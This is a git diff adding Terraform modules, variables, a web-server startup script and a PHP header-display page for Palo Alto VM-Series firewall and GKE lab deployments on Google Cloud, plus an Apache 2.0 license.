@@ -0,0 +1,3 @@
+output vmseries_rigm {
+ value = google_compute_region_instance_group_manager.vmseries_rigm.instance_group
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vmseries/variables.tf b/gcp/ilbnh-mig/modules/vmseries/variables.tf
new file mode 100644
index 00000000..271a7b55
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vmseries/variables.tf
@@ -0,0 +1,121 @@
+variable networks {
+ type = list(string)
+}
+
+variable subnetworks {
+ type = list(string)
+}
+
+variable base_name {
+}
+
+variable machine_type {
+}
+
+variable region {
+}
+
+variable zones {
+ type = list(string)
+}
+
+variable cpu_platform {
+ default = "Intel Broadwell"
+}
+variable disk_type {
+ default = "pd-ssd"
+}
+variable bootstrap_bucket {
+ default = ""
+}
+
+variable ssh_key {
+ default = ""
+}
+
+variable public_lb_create {
+ default = false
+}
+
+variable target_size {
+ default = "1"
+}
+
+variable scopes {
+ type = list(string)
+
+ default = [
+ "https://www.googleapis.com/auth/compute.readonly",
+ "https://www.googleapis.com/auth/cloud.useraccounts.readonly",
+ "https://www.googleapis.com/auth/devstorage.read_only",
+ "https://www.googleapis.com/auth/logging.write",
+ "https://www.googleapis.com/auth/monitoring.write",
+ ]
+}
+
+variable image {
+}
+
+variable tags {
+ type = list(string)
+ default = []
+}
+
+variable create_instance_group {
+ type = bool
+ default = false
+}
+
+variable instance_group_names {
+ type = list(string)
+ default = ["vmseries-instance-group"]
+}
+
+variable dependencies {
+ type = list(string)
+ default = []
+}
+
+variable mgmt_interface_swap {
+ default = ""
+}
+
+variable nic0_ip {
+ type = list(string)
+ default = [""]
+}
+
+variable nic1_ip {
+ type = list(string)
+ default = [""]
+}
+
+variable nic2_ip {
+ type = list(string)
+ default = [""]
+}
+
+variable nic3_ip {
+ type = list(string)
+ default = [""]
+}
+
+variable nic0_public_ip {
+ type = bool
+ default = false
+}
+
+variable nic1_public_ip {
+ type = bool
+ default = false
+}
+
+variable nic2_public_ip {
+ type = bool
+ default = false
+}
+
+variable nic3_public_ip {
+ type = bool
+ default = false
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vpc/main.tf b/gcp/ilbnh-mig/modules/vpc/main.tf
new file mode 100644
index 00000000..6c681d08
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vpc/main.tf
@@ -0,0 +1,25 @@
+resource "google_compute_network" "default" {
+ name = var.vpc
+ delete_default_routes_on_create = var.delete_default_route
+ auto_create_subnetworks = false
+}
+
+resource "google_compute_subnetwork" "default" {
+ name = var.subnet
+ ip_cidr_range = var.cidr
+ region = var.region
+ network = google_compute_network.default.self_link
+}
+
+resource "google_compute_firewall" "default" {
+ count = length(var.allowed_sources) != 0 ? 1 : 0
+ name = "${google_compute_network.default.name}-ingress"
+ network = google_compute_network.default.self_link
+ direction = "INGRESS"
+ source_ranges = var.allowed_sources
+
+ allow {
+ protocol = var.allowed_protocol
+ ports = var.allowed_ports
+ }
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vpc/outputs.tf b/gcp/ilbnh-mig/modules/vpc/outputs.tf
new file mode 100644
index 00000000..dbf7ed78
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vpc/outputs.tf
@@ -0,0 +1,29 @@
+output network_self_link {
+# value = google_compute_network.default.*.self_link
+ value = google_compute_network.default.self_link
+}
+
+output subnetwork_id {
+ value = google_compute_subnetwork.default.*.id
+}
+
+output subnetwork_name {
+ value = google_compute_subnetwork.default.*.name
+}
+
+output subnetwork_self_link {
+# value = google_compute_subnetwork.default.*.self_link
+ value = google_compute_subnetwork.default.self_link
+}
+
+output vpc_name {
+ value = google_compute_network.default.*.name
+}
+
+output vpc_id {
+ value = google_compute_network.default.*.id[0]
+}
+
+output vpc_self_link {
+ value = google_compute_network.default.*.self_link[0]
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/modules/vpc/variables.tf b/gcp/ilbnh-mig/modules/vpc/variables.tf
new file mode 100644
index 00000000..04407a0d
--- /dev/null
+++ b/gcp/ilbnh-mig/modules/vpc/variables.tf
@@ -0,0 +1,29 @@
+variable vpc {
+}
+
+variable subnet {
+}
+
+variable cidr {
+}
+
+variable region {
+}
+
+variable allowed_sources {
+ type = list(string)
+ default = []
+}
+
+variable allowed_protocol {
+ default = "all"
+}
+
+variable allowed_ports {
+ type = list(string)
+ default = []
+}
+
+variable delete_default_route {
+ default = "false"
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/project.tf b/gcp/ilbnh-mig/project.tf
new file mode 100644
index 00000000..a65b533f
--- /dev/null
+++ b/gcp/ilbnh-mig/project.tf
@@ -0,0 +1,15 @@
+terraform {
+ required_version = ">= 0.12"
+}
+
+provider "google" {
+ credentials = var.auth_file
+ project = var.project_id
+ region = var.region
+}
+
+provider "google-beta" {
+ version = "> 2.50.0"
+}
+
+data "google_compute_zones" "available" {}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/scripts/showheaders.php b/gcp/ilbnh-mig/scripts/showheaders.php
new file mode 100644
index 00000000..19c37318
--- /dev/null
+++ b/gcp/ilbnh-mig/scripts/showheaders.php
@@ -0,0 +1,62 @@
+
+ SOURCE & DESTINATION ADDRESSES
+ ';
+echo ''. "INTERVAL" .': '. $time .' ';
+$localIPAddress = getHostByName(getHostName());
+$sourceIPAddress = getRealIpAddr();
+echo ''. "SOURCE IP" .': '. $sourceIPAddress .' ';
+echo ''. "LOCAL IP" .': '. $localIPAddress .' ';
+
+$vm_name = gethostname();
+echo ''. "VM NAME" .': '. $vm_name .' ';
+echo ''. ' ';
+echo '
+ HEADER INFORMATION
+ ';
+/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */
+foreach ($_SERVER as $header => $value) {
+ if (substr($header, 0, 5) == 'HTTP_') {
+ /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */
+ $clean_header = strtolower(substr($header, 5, strlen($header)));
+
+ /* Replace underscores by the dashes, as the browser sends them */
+ $clean_header = str_replace('_', '-', $clean_header);
+
+ /* Cleanup: standard headers are first-letter uppercase */
+ $clean_header = ucwords($clean_header, " \t\r\n\f\v-");
+
+ /* And show'm */
+ echo ''. $header .': '. $value .' ';
+ }
+}
+?>
diff --git a/gcp/ilbnh-mig/scripts/webserver-startup.sh b/gcp/ilbnh-mig/scripts/webserver-startup.sh
new file mode 100644
index 00000000..a19aefe9
--- /dev/null
+++ b/gcp/ilbnh-mig/scripts/webserver-startup.sh
@@ -0,0 +1,9 @@
+#!/bin/bash
+until sudo apt-get update; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y php; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y apache2; do echo "Retrying"; sleep 2; done
+until sudo apt-get install -y libapache2-mod-php; do echo "Retrying"; sleep 2; done
+until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 2; done
+until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_4fw_2spoke/scripts/showheaders.php; do echo "Retrying"; sleep 2; done
+until sudo systemctl restart apache2; do echo "Retrying"; sleep 2; done
+until sudo apt-get autoremove -y --purge sshguard; do echo "Retrying"; sleep 2; done
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/servers.tf b/gcp/ilbnh-mig/servers.tf
new file mode 100644
index 00000000..fe563ba5
--- /dev/null
+++ b/gcp/ilbnh-mig/servers.tf
@@ -0,0 +1,29 @@
+#-----------------------------------------------------------------------------------------------
+# Create N webservers in one subnet. N is determined by the number of hostnames in the list
+module "server1" {
+ source = "./modules/vm/"
+ names = var.server1_vms
+ zones = [data.google_compute_zones.available.names[0]]
+ subnetworks = [module.vpc0.subnetwork_self_link]
+ server_ips = var.server1_ips
+ server_public_ip = var.server_public_ip
+ machine_type = var.server_size
+ image = var.server_image
+ ssh_key = fileexists(var.public_key_path) ? "${var.server_user}:${file(var.public_key_path)}" : ""
+ startup_script = file("${path.module}/scripts/webserver-startup.sh")
+}
+
+#-----------------------------------------------------------------------------------------------
+# Create X webservers in another subnet. X is determined by the number of hostnames in the list
+module "server2" {
+ source = "./modules/vm/"
+ names = var.server2_vms
+ zones = [data.google_compute_zones.available.names[0]]
+ subnetworks = [module.vpc2.subnetwork_self_link]
+ server_ips = var.server2_ips
+ server_public_ip = var.server_public_ip
+ machine_type = var.server_size
+ image = var.server_image
+ ssh_key = fileexists(var.public_key_path) ? "${var.server_user}:${file(var.public_key_path)}" : ""
+ startup_script = file("${path.module}/scripts/webserver-startup.sh")
+}
\ No newline at end of file
diff --git a/gcp/ilbnh-mig/terraform.tfvars b/gcp/ilbnh-mig/terraform.tfvars
new file mode 100644
index 00000000..31dd7687
--- /dev/null
+++ b/gcp/ilbnh-mig/terraform.tfvars
@@ -0,0 +1,48 @@
+project_id = ""
+auth_file = ""
+public_key_path = "" # Your SSH Key
+
+#fw_panos = "byol-904" # Uncomment for PAN-OS 9.0.4 - BYOL
+fw_panos = "bundle1-904" # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 1
+#fw_panos = "bundle2-904" # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 2
+
+
+#-------------------------------------------------------------------
+region = "us-central1"
+
+vpc0 = "testing"
+vpc0_subnet = "testing-subnet"
+vpc0_cidr = "10.30.1.0/24"
+
+vpc1 = "mgmt"
+vpc1_subnet = "mgmt-subnet"
+vpc1_cidr = "10.60.1.0/24"
+
+vpc2 = "production"
+vpc2_subnet = "production-subnet"
+vpc2_cidr = "10.50.1.0/24"
+
+vpc3 = "production2"
+vpc3_subnet = "production2-subnet"
+vpc3_cidr = "10.40.1.0/24"
+
+fw_base_name = "vmseries"
+fw_machine_type = "n1-standard-4"
+target_size = "1"
+
+mgmt_sources = ["0.0.0.0/0"]
+health_check_port = "22"
+all_ports = true
+
+server_user = "demo"
+server_size = "f1-micro"
+server_image = "ubuntu-os-cloud/ubuntu-1604-lts"
+server_public_ip = true
+server1_vms = ["testing-vm"]
+server1_ips = ["10.30.1.100"]
+
+server2_vms = ["production-vm"]
+server2_ips = ["10.50.1.100"]
+
+ilb1_ip = "10.30.1.99"
+ilb2_ip = "10.50.1.99"
diff --git a/gcp/ilbnh-mig/variables.tf b/gcp/ilbnh-mig/variables.tf
new file mode 100644
index 00000000..98a46495
--- /dev/null
+++ b/gcp/ilbnh-mig/variables.tf
@@ -0,0 +1,122 @@
+variable project_id {
+ description = "GCP Project ID"
+}
+
+variable auth_file {
+ description = "GCP Project auth file"
+ default = ""
+}
+
+variable region {
+}
+
+variable fw_panos {
+ description = "VM-Series license and PAN-OS (ie: bundle1-814, bundle2-814, or byol-814)"
+}
+
+variable fw_image {
+ default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries"
+}
+
+variable fw_base_name {
+}
+
+variable target_size {
+}
+
+variable fw_machine_type {
+}
+
+variable mgmt_sources {
+ type = list(string)
+}
+
+variable health_check_port {
+ description = "Port the ILB will health check"
+ default = "22"
+}
+
+variable all_ports {
+ description = "Enable all ports on the ILB"
+ default = true
+}
+variable vpc1 {
+}
+
+variable vpc1_subnet {
+}
+
+variable vpc1_cidr {
+}
+
+variable vpc0 {
+}
+
+variable vpc0_subnet {
+}
+
+variable vpc0_cidr {
+}
+
+variable vpc2 {
+}
+
+variable vpc2_subnet {
+}
+
+variable vpc2_cidr {
+}
+
+variable vpc3 {
+}
+
+variable vpc3_subnet {
+}
+
+variable vpc3_cidr {
+}
+
+variable server1_vms {
+ type = list(string)
+}
+
+variable server1_ips {
+ type = list(string)
+}
+
+variable server2_vms {
+ type = list(string)
+}
+
+variable server_user {
+ description = "SSH user for Linux VM"
+}
+
+variable server2_ips {
+ type = list(string)
+}
+
+variable server_size {
+ description = "Machine size for the server VMs"
+}
+
+variable server_image {
+ description = "OS image for server installation"
+}
+
+variable server_public_ip {
+ description = "Should we assign a public IP to the server"
+ default = false
+}
+
+variable public_key_path {
+ description = "Local path to public SSH key. If you do not have a public key, run >> ssh-keygen -f ~/.ssh/demo-key -t rsa -C admin"
+}
+
+variable ilb1_ip {
+ description = "IP address for ILB1"
+}
+
+variable ilb2_ip {
+ description = "IP address for ILB2"
+}
diff --git a/gcp/k8s-Prisma-API/.gitignore b/gcp/k8s-Prisma-API/.gitignore
new file mode 100644
index 00000000..8d51dd09
--- /dev/null
+++ b/gcp/k8s-Prisma-API/.gitignore
@@ -0,0 +1,2 @@
+# pycharm
+.DS_Store
diff --git a/gcp/k8s-Prisma-API/.meta-cnc.yaml b/gcp/k8s-Prisma-API/.meta-cnc.yaml
new file mode 100644
index 00000000..e651d353
--- /dev/null
+++ b/gcp/k8s-Prisma-API/.meta-cnc.yaml
@@ -0,0 +1,43 @@
+name: gke_k8s_EW_inspection
+
+# label should be a human readable label that conveys what this skillet will do
+label: GCP 4-node k8s cluster with VM-Series Firewall
+
+description: This skillet deploys a 4-node GCP k8s cluster with a VM-Series Firewall for both N/S and E/W Inspection. This is the base deployment used in the Ignite 19 k8s HOW lab. There is also a guide that walks through deploying a 2 tier container application and Prisma Public Cloud API scanning.
+
+# type instructs Panhandler how to consume this skillet
+type: terraform
+
+# extends allows you to include other skillets along with this one
+extends:
+
+# labels allow extensible configuration options per skillet type. For example, lables can be used to
+# group multiple skillets of the same type (pan-os skillets labeled as version: 9.0 for example)
+labels:
+ collection: GCP K8s Prisma API
+
+
+# Variables will be presented to the user via the Panhandler GUI. These values will then be passed to
+# the terraform binary as '--var' options, thus overriding any tfvars entries.
+# Variable names MUST match the names of the defined terraform variables
+variables:
+ - name: container-ver
+ description: GCP Container Ver
+ default: 1.11.10-gke.4
+ type_hint: gcloud container get-server-config --zone us-central1
+ - name: my_gcp_project
+ description: GCP Project
+ default: djs-gcp-2018
+ type_hint: project id
+ - name: region
+ description: GCP Region
+ default: us-central1
+ type_hint: text
+ - name: zone
+ description: GCP Zone
+ default: us-central1-a
+ type_hint: text
+ - name: credentials_file_path
+ description: Path to the JSON file used to describe your account credentials
+ default: djs-gcp-2018-creds.json
+ type_hint: text
diff --git a/gcp/k8s-Prisma-API/LICENSE b/gcp/k8s-Prisma-API/LICENSE
new file mode 100644
index 00000000..261eeb9e
--- /dev/null
+++ b/gcp/k8s-Prisma-API/LICENSE
@@ -0,0 +1,201 @@
+ Apache License
+ Version 2.0, January 2004
+ http://www.apache.org/licenses/
+
+ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+ 1. Definitions.
+
+ "License" shall mean the terms and conditions for use, reproduction,
+ and distribution as defined by Sections 1 through 9 of this document.
+
+ "Licensor" shall mean the copyright owner or entity authorized by
+ the copyright owner that is granting the License.
+
+ "Legal Entity" shall mean the union of the acting entity and all
+ other entities that control, are controlled by, or are under common
+ control with that entity. For the purposes of this definition,
+ "control" means (i) the power, direct or indirect, to cause the
+ direction or management of such entity, whether by contract or
+ otherwise, or (ii) ownership of fifty percent (50%) or more of the
+ outstanding shares, or (iii) beneficial ownership of such entity.
+
+ "You" (or "Your") shall mean an individual or Legal Entity
+ exercising permissions granted by this License.
+
+ "Source" form shall mean the preferred form for making modifications,
+ including but not limited to software source code, documentation
+ source, and configuration files.
+
+ "Object" form shall mean any form resulting from mechanical
+ transformation or translation of a Source form, including but
+ not limited to compiled object code, generated documentation,
+ and conversions to other media types.
+
+ "Work" shall mean the work of authorship, whether in Source or
+ Object form, made available under the License, as indicated by a
+ copyright notice that is included in or attached to the work
+ (an example is provided in the Appendix below).
+
+ "Derivative Works" shall mean any work, whether in Source or Object
+ form, that is based on (or derived from) the Work and for which the
+ editorial revisions, annotations, elaborations, or other modifications
+ represent, as a whole, an original work of authorship. For the purposes
+ of this License, Derivative Works shall not include works that remain
+ separable from, or merely link (or bind by name) to the interfaces of,
+ the Work and Derivative Works thereof.
+
+ "Contribution" shall mean any work of authorship, including
+ the original version of the Work and any modifications or additions
+ to that Work or Derivative Works thereof, that is intentionally
+ submitted to Licensor for inclusion in the Work by the copyright owner
+ or by an individual or Legal Entity authorized to submit on behalf of
+ the copyright owner. For the purposes of this definition, "submitted"
+ means any form of electronic, verbal, or written communication sent
+ to the Licensor or its representatives, including but not limited to
+ communication on electronic mailing lists, source code control systems,
+ and issue tracking systems that are managed by, or on behalf of, the
+ Licensor for the purpose of discussing and improving the Work, but
+ excluding communication that is conspicuously marked or otherwise
+ designated in writing by the copyright owner as "Not a Contribution."
+
+ "Contributor" shall mean Licensor and any individual or Legal Entity
+ on behalf of whom a Contribution has been received by Licensor and
+ subsequently incorporated within the Work.
+
+ 2. Grant of Copyright License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ copyright license to reproduce, prepare Derivative Works of,
+ publicly display, publicly perform, sublicense, and distribute the
+ Work and such Derivative Works in Source or Object form.
+
+ 3. Grant of Patent License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ (except as stated in this section) patent license to make, have made,
+ use, offer to sell, sell, import, and otherwise transfer the Work,
+ where such license applies only to those patent claims licensable
+ by such Contributor that are necessarily infringed by their
+ Contribution(s) alone or by combination of their Contribution(s)
+ with the Work to which such Contribution(s) was submitted. If You
+ institute patent litigation against any entity (including a
+ cross-claim or counterclaim in a lawsuit) alleging that the Work
+ or a Contribution incorporated within the Work constitutes direct
+ or contributory patent infringement, then any patent licenses
+ granted to You under this License for that Work shall terminate
+ as of the date such litigation is filed.
+
+ 4. Redistribution. You may reproduce and distribute copies of the
+ Work or Derivative Works thereof in any medium, with or without
+ modifications, and in Source or Object form, provided that You
+ meet the following conditions:
+
+ (a) You must give any other recipients of the Work or
+ Derivative Works a copy of this License; and
+
+ (b) You must cause any modified files to carry prominent notices
+ stating that You changed the files; and
+
+ (c) You must retain, in the Source form of any Derivative Works
+ that You distribute, all copyright, patent, trademark, and
+ attribution notices from the Source form of the Work,
+ excluding those notices that do not pertain to any part of
+ the Derivative Works; and
+
+ (d) If the Work includes a "NOTICE" text file as part of its
+ distribution, then any Derivative Works that You distribute must
+ include a readable copy of the attribution notices contained
+ within such NOTICE file, excluding those notices that do not
+ pertain to any part of the Derivative Works, in at least one
+ of the following places: within a NOTICE text file distributed
+ as part of the Derivative Works; within the Source form or
+ documentation, if provided along with the Derivative Works; or,
+ within a display generated by the Derivative Works, if and
+ wherever such third-party notices normally appear. The contents
+ of the NOTICE file are for informational purposes only and
+ do not modify the License. You may add Your own attribution
+ notices within Derivative Works that You distribute, alongside
+ or as an addendum to the NOTICE text from the Work, provided
+ that such additional attribution notices cannot be construed
+ as modifying the License.
+
+ You may add Your own copyright statement to Your modifications and
+ may provide additional or different license terms and conditions
+ for use, reproduction, or distribution of Your modifications, or
+ for any such Derivative Works as a whole, provided Your use,
+ reproduction, and distribution of the Work otherwise complies with
+ the conditions stated in this License.
+
+ 5. Submission of Contributions. Unless You explicitly state otherwise,
+ any Contribution intentionally submitted for inclusion in the Work
+ by You to the Licensor shall be under the terms and conditions of
+ this License, without any additional terms or conditions.
+ Notwithstanding the above, nothing herein shall supersede or modify
+ the terms of any separate license agreement you may have executed
+ with Licensor regarding such Contributions.
+
+ 6. Trademarks. This License does not grant permission to use the trade
+ names, trademarks, service marks, or product names of the Licensor,
+ except as required for reasonable and customary use in describing the
+ origin of the Work and reproducing the content of the NOTICE file.
+
+ 7. Disclaimer of Warranty. Unless required by applicable law or
+ agreed to in writing, Licensor provides the Work (and each
+ Contributor provides its Contributions) on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+ implied, including, without limitation, any warranties or conditions
+ of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+ PARTICULAR PURPOSE. You are solely responsible for determining the
+ appropriateness of using or redistributing the Work and assume any
+ risks associated with Your exercise of permissions under this License.
+
+ 8. Limitation of Liability. In no event and under no legal theory,
+ whether in tort (including negligence), contract, or otherwise,
+ unless required by applicable law (such as deliberate and grossly
+ negligent acts) or agreed to in writing, shall any Contributor be
+ liable to You for damages, including any direct, indirect, special,
+ incidental, or consequential damages of any character arising as a
+ result of this License or out of the use or inability to use the
+ Work (including but not limited to damages for loss of goodwill,
+ work stoppage, computer failure or malfunction, or any and all
+ other commercial damages or losses), even if such Contributor
+ has been advised of the possibility of such damages.
+
+ 9. Accepting Warranty or Additional Liability. While redistributing
+ the Work or Derivative Works thereof, You may choose to offer,
+ and charge a fee for, acceptance of support, warranty, indemnity,
+ or other liability obligations and/or rights consistent with this
+ License. However, in accepting such obligations, You may act only
+ on Your own behalf and on Your sole responsibility, not on behalf
+ of any other Contributor, and only if You agree to indemnify,
+ defend, and hold each Contributor harmless for any liability
+ incurred by, or claims asserted against, such Contributor by reason
+ of your accepting any such warranty or additional liability.
+
+ END OF TERMS AND CONDITIONS
+
+ APPENDIX: How to apply the Apache License to your work.
+
+ To apply the Apache License to your work, attach the following
+ boilerplate notice, with the fields enclosed by brackets "[]"
+ replaced with your own identifying information. (Don't include
+ the brackets!) The text should be enclosed in the appropriate
+ comment syntax for the file format. We also recommend that a
+ file or class name and description of purpose be included on the
+ same "printed page" as the copyright notice for easier
+ identification within third-party archives.
+
+ Copyright [yyyy] [name of copyright owner]
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
diff --git a/gcp/k8s-Prisma-API/Main.tf b/gcp/k8s-Prisma-API/Main.tf
new file mode 100644
index 00000000..92932bc5
--- /dev/null
+++ b/gcp/k8s-Prisma-API/Main.tf
@@ -0,0 +1,358 @@
+provider "google" {
+ credentials = "${file(var.credentials_file_path)}"
+ project = "${var.my_gcp_project}"
+ region = "${var.region}"
+}
+
+// Adding SSH Public Key Project Wide
+resource "google_compute_project_metadata_item" "ssh-keys" {
+ key = "ssh-keys"
+ value = "${var.gce_ssh_user}:${var.gce_ssh_pub_key}"
+}
+
+// Adding VPC Networks to Project MANAGEMENT
+resource "google_compute_subnetwork" "management-sub" {
+ name = "management-sub"
+ ip_cidr_range = "10.5.0.0/24"
+ network = "${google_compute_network.management.self_link}"
+ region = "${var.region}"
+}
+
+resource "google_compute_network" "management" {
+ name = "${var.interface_0_name}"
+ auto_create_subnetworks = "false"
+}
+
+// Adding VPC Networks to Project UNTRUST
+resource "google_compute_subnetwork" "untrust-sub" {
+ name = "untrust-sub"
+ ip_cidr_range = "10.5.1.0/24"
+ network = "${google_compute_network.untrust.self_link}"
+ region = "${var.region}"
+}
+
+resource "google_compute_network" "untrust" {
+ name = "${var.interface_1_name}"
+ auto_create_subnetworks = "false"
+}
+
+// Adding VPC Networks to Project TRUST
+resource "google_compute_subnetwork" "trust-sub" {
+ name = "trust-sub"
+ ip_cidr_range = "10.5.2.0/24"
+ network = "${google_compute_network.trust.self_link}"
+ region = "${var.region}"
+}
+
+resource "google_compute_network" "trust" {
+ name = "${var.interface_2_name}"
+ auto_create_subnetworks = "false"
+}
+
+// Adding GCP Outbound Route to TRUST Interface
+resource "google_compute_route" "trust" {
+ name = "trust-route"
+ dest_range = "0.0.0.0/0"
+ network = "${google_compute_network.trust.self_link}"
+ next_hop_instance = "${element(google_compute_instance.firewall.*.name,count.index)}"
+ next_hop_instance_zone = "${var.zone}"
+ priority = 100
+
+ depends_on = ["google_compute_instance.firewall",
+ "google_compute_network.trust",
+ "google_compute_network.untrust",
+ "google_compute_network.management",
+ "google_container_cluster.cluster",
+ "google_compute_instance.firewall",
+ "google_container_node_pool.db_nodes",
+ ]
+}
+
+// Adding GCP Route to Cluster MGMT Endpoint
+resource "google_compute_route" "k8mgmt" {
+ name = "cluster-endpoint-route"
+ dest_range = "${element(google_container_cluster.cluster.*.endpoint,count.index)}/32"
+ network = "${google_compute_network.trust.self_link}"
+ next_hop_gateway = "default-internet-gateway"
+ priority = 100
+
+ depends_on = ["google_compute_instance.firewall",
+ "google_compute_network.trust",
+ "google_compute_network.untrust",
+ "google_compute_network.management",
+ "google_container_cluster.cluster",
+ "google_compute_instance.firewall",
+ "google_container_node_pool.db_nodes",
+ ]
+}
+
+// Adding GCP Firewall Rules for MANGEMENT
+resource "google_compute_firewall" "allow-mgmt" {
+ name = "allow-mgmt"
+ network = "${google_compute_network.management.self_link}"
+
+ allow {
+ protocol = "icmp"
+ }
+
+ allow {
+ protocol = "tcp"
+ ports = ["443", "22"]
+ }
+
+ source_ranges = ["0.0.0.0/0"]
+}
+
+// Adding GCP Firewall Rules for INBOUND
+resource "google_compute_firewall" "allow-inbound" {
+ name = "allow-inbound"
+ network = "${google_compute_network.untrust.self_link}"
+
+ allow {
+ protocol = "tcp"
+ ports = ["80", "22", "8888"]
+ }
+
+ source_ranges = ["0.0.0.0/0"]
+}
+
+// Adding GCP Firewall Rules for OUTBOUND
+resource "google_compute_firewall" "allow-outbound" {
+ name = "allow-outbound"
+ network = "${google_compute_network.trust.self_link}"
+
+ allow {
+ protocol = "all"
+
+ # ports = ["all"]
+ }
+
+ source_ranges = ["0.0.0.0/0"]
+}
+
+// Create a new Palo Alto Networks NGFW VM-Series GCE instance
+resource "google_compute_instance" "firewall" {
+ name = "${var.firewall_name}-${count.index + 1}"
+ machine_type = "${var.machine_type_fw}"
+ zone = "${var.zone}"
+ can_ip_forward = true
+ allow_stopping_for_update = true
+ count = 1
+
+ // Adding METADATA Key Value pairs to VM-Series GCE instance
+ metadata {
+ vmseries-bootstrap-gce-storagebucket = "${var.bootstrap_bucket_fw}"
+ serial-port-enable = true
+
+ #sshKeys = "${var.public_key}"
+ }
+
+ service_account {
+ scopes = "${var.scopes_fw}"
+ }
+
+ network_interface {
+ subnetwork = "${google_compute_subnetwork.management-sub.self_link}"
+ network_ip = "10.5.0.4"
+
+ //address = "10.5.0.4"
+ access_config = {}
+ }
+
+ network_interface {
+ subnetwork = "${google_compute_subnetwork.untrust-sub.self_link}"
+
+ network_ip = "10.5.1.4"
+ access_config = {}
+ }
+
+ network_interface {
+ subnetwork = "${google_compute_subnetwork.trust-sub.self_link}"
+
+ network_ip = "10.5.2.100"
+ }
+
+ boot_disk {
+ initialize_params {
+ image = "${var.image_fw}"
+ }
+ }
+
+ depends_on = [
+ "google_compute_network.trust",
+ "google_compute_subnetwork.trust-sub",
+ ]
+}
+
+//Create a K8s cluster
+resource "google_container_cluster" "cluster" {
+ name = "cluster-1"
+ zone = "${var.zone}"
+ min_master_version = "${var.container-ver}"
+ initial_node_count = 2
+ enable_kubernetes_alpha = true
+ cluster_ipv4_cidr = "10.16.0.0/14"
+ logging_service = "none"
+ monitoring_service = "none"
+ network = "${google_compute_network.trust.self_link}"
+ subnetwork = "${google_compute_subnetwork.trust-sub.self_link}"
+
+ maintenance_policy {
+ daily_maintenance_window {
+ start_time = "03:00"
+ }
+ }
+
+ addons_config {
+ http_load_balancing {
+ disabled = false
+ }
+
+ horizontal_pod_autoscaling {
+ disabled = false
+ }
+ }
+
+ node_config {
+ disk_size_gb = "32"
+ image_type = "COS"
+ machine_type = "n1-standard-1"
+ preemptible = false
+ oauth_scopes = ["https://www.googleapis.com/auth/devstorage.read_only", "https://www.googleapis.com/auth/logging.write", "https://www.googleapis.com/auth/monitoring", "https://www.googleapis.com/auth/servicecontrol", "https://www.googleapis.com/auth/service.management.readonly", "https://www.googleapis.com/auth/trace.append"]
+
+ labels {
+ pool = "web-pool"
+ cluster = "the-cluster"
+ }
+
+ tags = ["the-cluster", "gke-node", "web-tier"]
+ }
+
+ lifecycle {
+ create_before_destroy = true
+ }
+
+ depends_on = [
+ "google_compute_network.trust",
+ "google_compute_subnetwork.trust-sub",
+ "google_compute_instance.firewall",
+ ]
+}
+
+resource "google_container_node_pool" "db_nodes" {
+ name = "db-node-pool"
+ region = "${var.zone}"
+ cluster = "${google_container_cluster.cluster.name}"
+ node_count = 2
+
+ node_config {
+ disk_size_gb = "32"
+ image_type = "COS"
+ machine_type = "n1-standard-1"
+ preemptible = false
+ oauth_scopes = ["https://www.googleapis.com/auth/devstorage.read_only", "https://www.googleapis.com/auth/logging.write", "https://www.googleapis.com/auth/monitoring", "https://www.googleapis.com/auth/servicecontrol", "https://www.googleapis.com/auth/service.management.readonly", "https://www.googleapis.com/auth/trace.append"]
+
+ labels {
+ pool = "db-pool"
+ cluster = "the-cluster"
+ }
+
+ tags = ["the-cluster", "gke-node", "db-tier"]
+ }
+
+ lifecycle {
+ create_before_destroy = true
+ }
+
+ depends_on = [
+ "google_compute_network.trust",
+ "google_compute_subnetwork.trust-sub",
+ "google_compute_instance.firewall",
+ "google_container_cluster.cluster",
+ ]
+}
+
+// Adding GCP Route to Node instances
+resource "google_compute_route" "gke-node0" {
+ name = "gke-node0"
+ dest_range = "10.16.0.0/24"
+ network = "${google_compute_network.trust.self_link}"
+ next_hop_instance = "${element(google_compute_instance.firewall.*.name,count.index)}"
+ next_hop_instance_zone = "${var.zone}"
+ priority = 10
+ tags = ["db-tier"]
+
+ depends_on = ["google_compute_instance.firewall",
+ "google_compute_network.trust",
+ "google_compute_network.untrust",
+ "google_compute_network.management",
+ "google_container_cluster.cluster",
+ ]
+}
+
+resource "google_compute_route" "gke-node1" {
+ name = "gke-node1"
+ dest_range = "10.16.1.0/24"
+ network = "${google_compute_network.trust.self_link}"
+ next_hop_instance = "${element(google_compute_instance.firewall.*.name,count.index)}"
+ next_hop_instance_zone = "${var.zone}"
+ priority = 10
+ tags = ["db-tier"]
+
